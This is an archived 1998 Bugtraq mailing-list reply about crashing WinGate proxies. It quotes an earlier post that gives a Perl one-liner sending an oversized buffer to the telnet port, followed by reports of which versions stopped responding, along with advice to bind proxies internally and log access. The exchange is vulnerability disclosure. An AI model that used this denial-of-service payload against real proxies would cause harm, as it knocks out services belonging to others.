Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_4

Bugtraq archives for 4th quarter (Oct-Dec) 1998: Re: crashing wingates

Re: crashing wingates

Kotu Srinivasa Reddy (kotucyberspace.org)
Tue, 17 Nov 1998 01:05:27 +0530

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Matt M. Morris: "Re: ISS Security Advisory: Hidden community string in SNMP"
Previous message: Marc Heuse: "Re: Xinetd /tmp race? (long)"
Maybe in reply to: G23: "crashing wingates"

This is a multi-part message in MIME format.
--------------7C027181AD7A66528D2317BC
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,
        I have tested the C program received through bugtraq and have tested it
on Wingate 2.1d and i had run the program more than once to crash it.
Wingate stopped responding but the OS was stable.

Noam Rathaus wrote:
>
> Hi,
>
> I have to report that WinGate 2.1 seems to be unaffected.
>
> G23 wrote:
> >
> > Hello,
> >
> > The following one-liner will crash an open Wingate.
> >
> > perl -MIO::Socket -e \
> > 'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
> > ->send("X" x 4400 . "\n",0)'
> >
> > Unfortunately I don't have access to one that I can test,
> > so I am unable to verify what versions are vulnerable.
> > The above is my rendition of a 44 line sh script written
> > by "rEWTED" (kefkainfected.org).
> >
> > Anyone configuring a proxy for LAN use should only bind to an internal
> > interface anyway.  (IE, kidz shouldn't even see your proxy)
> > http://wingate.net/helppages/wingate2Securing_your_network.html
> >
> > If you do provide telnet proxy for the world, then at least log.
> > http://wingate.net/helppages/wingate2Auditing_and_Logging.html
> >
> > ghost23
> >
> > ____________________________________________________________________
> > Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
>
> --
> Thanks
> Noam Rathaus
> http://members.xoom.com/dolittle
> for Exchange Server Q&A : http://members.xoom.com/dolittle
> PGP Key Fingerprint:  8AC7 62AD 860A 4327 3122  544F 34B6 F3A8 2515 7D02
>
> "and - Change your quote already!" - Al Avi
--------------7C027181AD7A66528D2317BC
Content-Type: text/x-vcard; charset=us-ascii;
 name="kotu.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Kotu Srinivasa Reddy
Content-Disposition: attachment;
 filename="kotu.vcf"

begin:vcard
n:Srinivasa Reddy;Kotu
x-mozilla-html:FALSE
url:http://i.am/kotu
org:Indian Institute of Technology;Dept. of Mining Engg.
version:2.1
email;internet:kotucyberspace.org
title:Student
adr;quoted-printable;quoted-printable:;;A Top, LLR Hall,=0D=0A=
        IIT,;Kharagpur;West Bengal;721302;INDIA
fn:Kotu Srinivasa Reddy
end:vcard


--------------7C027181AD7A66528D2317BC--

Next message: Matt M. Morris: "Re: ISS Security Advisory: Hidden community string in SNMP"
Previous message: Marc Heuse: "Re: Xinetd /tmp race? (long)"
Maybe in reply to: G23: "crashing wingates"